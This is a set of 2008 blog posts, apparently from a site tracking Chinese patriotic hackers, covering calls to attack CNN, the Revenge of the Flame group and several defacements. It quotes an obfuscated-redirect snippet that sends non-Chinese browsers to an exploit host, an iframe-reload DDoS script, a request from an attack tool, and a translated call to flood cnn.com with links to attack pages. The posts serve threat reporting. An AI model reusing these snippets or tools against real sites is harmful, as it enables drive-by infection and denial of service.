The Dark Visitor

Bruce Schneier is a well-known security and cryptography researcher.  He has a popular blog where he posted his recent article detailing “The Truth About Chinese Hackers”, which was written for Discovery Channel.

This article is not particularly insightful and sort of lumps all of the Chinese hackers into a single group of young, male patriotic kids doing it for the babes and limos.

These hacker groups seem not to be working for the Chinese government. They don’t seem to be coordinated by the Chinese military.

The hackers are in this for two reasons: fame and glory, and an attempt to make a living.

This is very short sighted.  We should be honest here, neither Bruce Schneier nor Heike and I know with absolute certainty what Chinese hackers are doing, who is coordinating them and who might be paying them.  Maybe the article shouldn’t be titled “The Truth About Chinese Hacker” because Bruce doesn’t know what the truth is (Heike would have said that he couldn’t handle the truth either, but that’s not my style).

I think a lot of people assume that activity attributed to the PRC is simply based on the IP address.  After studying spear phishing attacks, custom malware attacks and the types of data that have been exfiltrated from various NGO targets it seems likely that some entity is coordinating the collection and exploitation of this information.  In my humble opinion, there may be more to this than WoW passwords.

Richard Bejtlich blogged about the AF Cyber Panel last month and provides a plug for the TDV book which he reviewed a while ago.  The Cyber Panel had some informal discussion about the cyber-militia:

In the US, our DoD relies upon professional, uniformed military members, government civilians, and an immense contracting force to defend the nation and project its military power. In China, their PLA mixes uniformed military with ordinary civilians, some of whom act at the behest of the military and government, with others acting on their own for “patriotic means.” 

The discussion turns into a comparison of the US/PRC capabilities and specifically how the US can recruit and retain qualified cyber warriors.  The problem seems to be that the PRC can call up an army of qualified patriotic hackers while the US is having problems recruiting and retaining talent.

Routine business:

NEW DELHI: Hackers have struck again with nearly 10 websites belonging to various ministries and departments of the government of India coming under attack in the last 24 hours. The hackers are suspected to be from China, though there was no official confirmation.

Confirming the cyber attack, a senior IT ministry official told DNA, “Low to medium intensity cyber intrusions into web servers maintained by the Indian government have been reported.”

New Delhi…just shrugs.

The first calls are starting to make the rounds on Chinese hacker sites to attack the Sharon Stone website. The actress recently started a firestorm in China after she gave an interview suggesting that the earthquake in Sichuan was the result of bad karma. I guessed it would be just a matter of time before Chinese hackers targeted her online and have been monitoring the boards.

One site has posted a bit of initial reconnaissance of the website:

There was also a post asking to have the unofficial website of Sharon Stone hacked:

Tried going to the website for a contact address but found the, “This site may harm your computer” posting. Maybe Jumper will have the time to check it out later.

Ordinarily, I’d try to obfuscate text on this subject but since we’re already GFW’d, who cares…

A couple of sites are reporting that the well-known Tibet independence writer Woeser has had all or many of her online accounts hijacked and her website defaced with an anti-splittist message. The Honkers Union of China has taken responsibility.  The honkers have used her Skype account to attempt to contact her associates.  No word if the contact list has been abused to send malware.  Interesting snippet from the article:

The hackers removed the content of the website and replaced it with a gif animation of the Chinese flag with the headline “LONG LIVE THE PEOPLE’S REPUBLIC OF CHINA! “DOWN WITH TIBET INDEPENDENCE!” Below the animation is a photo of Woeser with the words “Please remember this Tibetan separatist Woeser’s ugly face. Whoever sees this ugly face, please beat her hard like one beats a dog.” Further text was added and has apparently been changed several times in the hours since the site was hacked. The website is currently hosted on a server in the United States.

The website is still defaced at the time of this writing.

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese - zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(”<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!

UPDATE FIZZLE: Just got word from Jose that nothing happened with the CNN website today. Chinese hackers are starting to make me look bad and I will not stand for that!!

If this keeps up, it may be easier to list the days that Chinese hackers are not calling for an attack on CNN.

Had some serious reservations about posting this article for a couple of reasons but decided it is probably worthwhile. The cons are that there is ZERO confirmation from other sites about the impending attack and the alert posting did not list a sponsoring organization. On the pro side, it included a website that was setup on the 20th (after initial attack) that is linked in the post and looks like it is there to support the action.

So, large CAVEAT: UNCONFIRMED

Added bonus, stupid clock again:

The Announcement

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issuses regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people.

If it is convenient, please circulate this message to all of your groups. We need support…. Currently, many of us are going to this webpage to carry out the attack, http://www.goupsoft.com.cn/Bs_Cnn.html. The first time you open it, it might not display. Just refresh the page and it should be okay.

Kinda Lazy (but genius!)

Over at the attack website of goupsoft.com, you land on an automated webpage that uses your computer and IP address to continuously “attack” the CNN website unless you close the browser. My guess is that it is constantly making fresh requests from CNN to tie up bandwidth. The graphic below even shows the number of attacks you have made on the site.

Yeah, I kinda attacked CNN 24 times…Whoops! Well, CNN never returned my e-mail either! Damn, I’m sort of a Chinese hacker now? Anyway, the only really interesting thing in that blurb of Chinese above is that they call CNN a “whore.” Really, twice.

This Attack Method Spreading

While this might be the oldest trick in the book, it is new to me so I’m putting it out there. The website http://www.chenmin.org/doscnn.html is using pretty much the exact same attack method as mentioned previously.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

<script>

var e=document.getElementById(’cnn’);

setInterval(”e.src=’http://www.cnn.com‘”,5000);

//1000 表示1000毫秒,你可以修改并转发

</script> Probably not as effective as the Mao-inator program.

I direct your attention to the last line (emphasis mine) in Jumper’s e-mail. Number one, he dubs the program he analyzed yesterday as the Mao-inator™, which I personally find hilarious. Number two, there seems to be a slight amount of professional jealousy involved since he is dismissing my program as “less effective” than the one he worked with. Yeah, but did yours call CNN a “whore” didn’t think so! Less effective, I think not sir!

All kidding aside, this is an excellent method for incorporating large numbers of unskilled people into your DDoS attack. It comes with the added advantage of using their computers, IP addresses and bandwidth and you don’t have to train them. The only skill that is required is the ability to open a webpage in a browser and let it run. Plus, recruits who might not be so willing to stick around to the end of the fight, if tied to a computer all day, are free to do whatever they want while at the same time defending the motherland. My vote GENIUS!

Make up your own odds if this will actually take place. I have informed Jose Nazario at Arbor Networks who has been monitoring this situation closely and has had great insights.

UPDATE 1: Located the blog for Li Haiwei, the owner of the attack website goupsoft.com.cn, and my boy has some serious issues with CNN and Tibet. Lots of disturbing imagery for the whole family:

The graphic reads, “CNN- I like it. I am CNN.” Then some stuff way too small to read. The Nobel Peace Prize award you can read yourself and at the bottom Tibet.

UPDATE 2: Netcraft has a live performance monitor for the CNN webiste here.

Does anyone remember Poizon B0x from the “Sino-US Hacking War” years ago?

Some Chinese Hacker group thinks Poizon B0x is coming back on a “China Killer” rampage in what they describe as a second round of the Sino-US hacking war.  Here is a gist of a board post from April 20, 2008:

Red Alert:  Beware of the United States hacker organization Poizon B0x coming in again.

No news organizations are reporting this but [rumors] are spreading around the Internet that a new round of the Sino-US hacking war [is coming... and] a May 1/Golden week special youth day counter-offensive [is planned], we hope for a lot of support in the counterattack!

The May 1st date mentioned above is highly significant as it coincides with the anniversary of the EP-3 incident in 2001 and the start of Chinese hacker counter-attacks:

American cracker group PoizonBOx has defaced at least a hundred Chinese websites since April 4 (2001). Chinese hackers are now vowing to retaliate with a planned week-long all-out crack attack on American websites and networks which will start on May 1(2001).

At this point, it is difficult to tell if this is speculation or if it is based on some defacements attributed to Poizon Box.  I can’t seem to find much else to corroborate this post so I’m a bit skeptical about all of this.  I’ll monitor the board and report any news as it comes in.  Any offline comments or questions can go to jumper *at* thedarkvisitor *dot* com.

CNN hating Chinese nationalists can download a tool to send high volumes of requests to www.cnn.com in an attempt to knock it offline.  The tool is bundled in a .rar file that contains a readme and the pre-compiled windows binary.  A quick virus check showed that some scanners identified it as backdoor but that didn’t seem to be the case.  When I ran the tool, a simple flag icon appeared in the lower right of my test VM.

 When I click on the flag, the full interface appears with three options:  start/stop, minimize and exit. 

Here is a sample of the request/response I got after running it for a few seconds:

GET /aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp HTTP/1.1

Accept: */*

Host: www.cnn.com

Connection: Keep-Alive

 
HTTP/1.1 400 Bad Request

Date: Tue, 22 Apr 2008 12:12:34 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 287

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at www.cnn.com Port 80</address>
</body></html>

I read somewhere that it is self-updating but I never saw any requests other than DNS resolution (to my own configured DNS servers, not hard-coded) and requests to www.cnn.com.  I’ll run it in “paused” mode for a while to see what happens.

UPDATE (0100GMT 23 April 08):  No suspicious traffic came from this binary (apart from what was expected, of course).

UPDATE (1628GMT 24 April 08): Heike and I have dubbed anticnn.exe the “Mao-inator”.

Danwei reporting that Chinese hackers are celebrating a successful hack on a portion of the CNN website with screen shots of their trophy:

The top picture is screen grab that shows the current state of the website. The second image shows the hacked web page and the slogans left by the hackers, both in English and Chinese.:

The leader of Revenge of the flame has taken down his website and posted a disbandment notice.

!!!We salute our lovable motherland!!!

(graphic posted in the center of this statement does not load)

Revenge of the Flame disbanded

There are actually many ways to be patriotic, we do not want to be impulsive, we should study well, struggle and take great effort to gain knowledge. Only in this way can we develop our motherland and our motherland’s strength. This is all we really wish to see happen.

The Revenge of the Flame has already halted all DDOS attacks, we do not advocate the attack, we advocate diligent study of technology. From this point on, any attack whatsoever, has nothing to do with Revenge of the Flame. If any member of our group, Revenge of the Flame, participates in this type of activity, it is an individual action and has nothing to do with cn_Magistrate or Hackerwolf. Request that everyone make careful deliberations.

(Note: I was under the impression that magistrate hackerwolf was one word, one name but obviously it is two individuals. Here are their blogs; cn_Magistrate and Hackerwolf.)

Currently, everyone on the internet is using the instrument of attack as a means to express their passion and this has already obstructed the motherland’s normal network communications. This is something we do not wish to see happen. Regardless if it is “Revenge of the Flame” or not, we hope that everyone can rationally reflect on this question.

From this moment, the Revenge of the Flame is disbanded!! If there are any notification after this, they will be posted here. We respectfully ask that you pay attention to this page.

Any attack whatsoever, regardless if it is by an individual or an organization, has serious consequences!!!!!!!!!!!!!!!!!!!!!!

The Revenge of the Flame exists no more forever!! We are now a “patriotic study organization” and we will take the flame into our heart! The Revenge of the Flame in our hearts can never be extinguished! We must struggle! We must work! We must turn our strengths into a shining sword spirit (this sentence may have a somewhat different meaning, not sure).

Without a doubt we must study even more, our forum has already been established. This is really our true exchange space.

http://bbs.hacksa.cn

cn_Magistrate
Hackerwolf

20 April 2008

To our lovable motherland, I say I love you!!

Located cn_Magistrate’s blog, the leader of Revenge of the Flame, here is a post from his blog on 18 April 2008:

As always, my thanks for everyone’s strong sense of nationalistic responsibility; once again, the Magistrate is grateful to everyone.

Today is 18 April, we are angry and we shall roar, the annoucement follows:

1. Prior to 8:00 pm on 18 April 2008, we invite everyone on IS (ID number 12570496).  We will have an important matter to pass along.  (This part a little rough on xlation) Please note our compatriots will find a way online, obey directions that have been put in place.
2. Tool download address, considering that there are many normal web users who do not have a high-degree of technical knowledge, we are providing idiot-type (really means for those who don’t know) tools for download. The download address: http://playgood.ys168.com/.  Everyone please pay attention to the group announcements.
3. Everyone please remain disciplined, listen to the directions of each of the group managers.  Pay attention to your own words, deeds and essence.  We are all Chinese!

18 April 2008
cn_Magistrate
Hackerwolf

Graphic Attached to Release by Revenge of the Flame

The Chinese hacker group that has been organizing to attack CNN has been identified as the “Revenge of the Flame.” They recently released a statement calling off the DDoS attack on CNN; however, it may have come too late to stop some of its members from going after the site. CNN has just filed a report stating that they had experienced an attack in an attempt to disrupt their website. For this reason, we will keep the clock up and see what happens tomorrow…it might not be over.

Statement from Revenge of the Flame:

In just three short days, our organization, the Revenge of the Flame, has grown large. First, I want to thank everyone for their strong sense of nationalistic responsibility. However, maybe we were too impetuous. We love our country! We will resist all anti-Chinese influences! However, we must choose the right way to come to the defense of our country, families and ourselves!!! After some core internal discussions, we have decided to temporarily cancel the 19th attack plan! The Revenge of the Flame organization still exists! Later we can be a computer discussion organization, we will study together for the day our country needs us! Our government and military will all mobilize! At that time, we will let those so-called foreign net-forces see! No matter where, China will never lose to them! We also have our net-forces! Perhaps at that time, our Revenge of the Flame will be the main strength! We all love our country! But, we must use sensible methods to defend our honor!

ATTENTION: Our original plan for 19 April has been canceled because too many people are aware of it and the situation is chaotic. At an unspecified date in the near future, we will launch the attack. We ask that everyone remain ready. I will repeat it again. At an unspecified date in the near future, we will launch the attack. We are only at present cancelling the attack. We could send out a notice on the day of the attack and have it completed in one day. The attack hasn’t been cancelled; it will be carried out on an unspecified day in the near future. I think everyone understands what we mean.

We hope that even more people with the Chinese national blood will join our actions. Only in unity is there strength. We are not individuals, we are a collective, and we are Chinese.

17 April 2008
Magistrate
Hackwolf
Source: http://www.hacksa.cn

Continue Reading »

UPDATE: It looks like the organizers might be trying to put a stop to the attack due to the number of people who are aware of it. Translating some of it now.
UPDATE to UPDATE While the group may be trying to call off the attack, it might be too late. CNN is now reporting that they have been targeted in an attempt to disrupt their web site.
FINAL UPDATE FOR THIS POST: See the newest release by the group planning attack on CNN here

First, I have added a clock with the Beijing local time because it crossed my mind that some people might be thinking the scheduled attack on CNN is going to take place on US date, time. Nope, Beijing local. So that means it is suppose to take place tomorrow. I will leave the clock up if you want to check back.

Second, many more Chinese sites, not just hacker, starting to call for the DDOS attack on CNN. Also they are starting to solidify their plans. Here are the details from one posting on the Guilin University of Electronic Technology bulletin board:

1. Attack will start on 19 April 2008, at 8:00 pm
2. DDOS attack on www.cnn.com
3. The DDOS attack is going to last over three hours
4. They need a large number of compromised computers to carry out the attack and are requesting everyone’s support in putting to together the number needed

The plan has many more details but unfortunately the language is too technical for me to translate.

Here are additional sites calling for the attack on CNN.

http://bbs.neteasy.cn/showthread.php?p=984976
http://www.coogo.net/bbs/showtopic-444648.aspx
http://www.ytjt.com.cn/bbs/redirect.php?tid=36644&goto=lastpost
http://www.ipark.cn/bbs/Post.asp?PostID=836336
http://blog.xuite.net/lemon_head/simple/16728332
http://tieba.baidu.com/f?kz=357748876

Probably many more out there.

UPDATE: Carl Jongsma, from Computer World, was kind enough to provide us a little press on this breaking situation.

UPDATE: Tried once again to contact CNN and warn them of the scheduled attack. If anyone has a better contact than just their news tip e-mail, please inform them.

UPDATE (APRIL 18 1556GMT; Jumper): Arbor Networks is using their tools to monitor the situation.  Take a look at Jose Nazario’s post here.

UPDATE: Since we have some smart people looking at the blog, I wanted to post below part of the Chinese hackers’ attack plan. This seems to be part of the DDoS call for large numbers of attacking computers. Will supply what I can about the Chinese, though it is possibly wrong. If someone knows what this is referring to please post in the comments and we will move it to the blog:

总群：29332975 (This refers to the total number)
复仇的火焰分群1：10093595 (Revenge of the flame group 1)
复仇的火焰分群2：60087657 (Revenge of the flame group 2)
复仇的火焰分群3：17697381 (Revenge of the flame group 3)
复仇的火焰分群4：52911651 (Revenge of the flame group 4)
复仇的火焰分群5：13283694 (Revenge of the flame group 5)
复仇的火焰分群6：52274747 (Revenge of the flame group 6)
复仇的火焰分群7：13735729 (Revenge of the flame group 7)
复仇的火焰分群8：28556275 (Revenge of the flame group 8 )
复仇的火焰分群9：8333214 (Revenge of the flame group 9)
复仇的火焰分群10：24207831 (Revenge of the flame group 10)
复仇的火焰分群11：18574877 (Revenge of the flame group 11)

UPDATE to UPDATE Jumper figured out that these were probably the QQ numbers for the group leaders of the attack. When I went back and looked at some of the sites calling for the DDoS attack, one did list it as QQ群 or QQ groups.